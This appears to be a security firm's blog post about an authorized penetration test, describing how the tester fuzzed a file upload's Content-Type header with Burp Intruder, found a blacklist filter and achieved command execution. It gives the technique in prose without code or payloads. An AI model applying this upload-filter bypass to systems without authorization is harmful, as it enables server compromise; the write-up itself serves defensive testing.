Greetings everyone from Porta Platea,
In this article, I would like to inform you about a situation I encountered during the tests I carried out on the file upload area.
1. I received the necessary information for the “private.com” tests to be carried out by our project manager.
2. I verified the “scope form” right after the disclosure process.
3. I completed the discovery steps on the target application and started the security tests.
4. After some vulnerabilities were detected, I started special tests on the file upload area in the application. Why specifically?
File upload areas have a very important place in application security. The reason for this is that a vulnerability may cause harmful files to be uploaded to the server, allowing us to obtain a shell.
5. Based on this, I wanted to perform the last check in my checklist after applying various file upload attacks.
Check name : Content-Type Attacks Checks
Our purpose in this control is to determine whether a blacklist-based or white-list-based security measure is taken on the relevant application. If there is a blacklist based control, it is more likely to be bypassed than a whitelist. If it is whitelist, it should try to overcome with much more advanced techniques. Based on this, I created a detailed list by searching mime-types on google. I collected about 1617 mime-type variants and saved them in a small txt list.
Our aim here is to understand which file formats are accepted and which are not, by testing the mime-types in this list one by one on the content-type header in the file upload area of the relevant application. If the application returns false for all of them, it will most likely have taken a whitelist-based security measure, which will lead us to create attack vectors over accepted formats.
6. By adding the “content-types.txt” file that I created to the intruder via the burp suite software, I started the trial and error process on the “Content-Type” header belonging to the relevant application, and as I guessed, a black list-based control was applied on the application. I found that only certain format files are blocked and the rest can be loaded easily.
7. Starting from here, I was able to successfully load the application by creating a small command output over a content-type that is not controlled by the application and read the output of the command.
8. I finished the day with high motivation by adding the relevant finding and evidence to our safety report.
While testing various features on applications, you can detect various vulnerabilities by applying more attack vectors without giving up.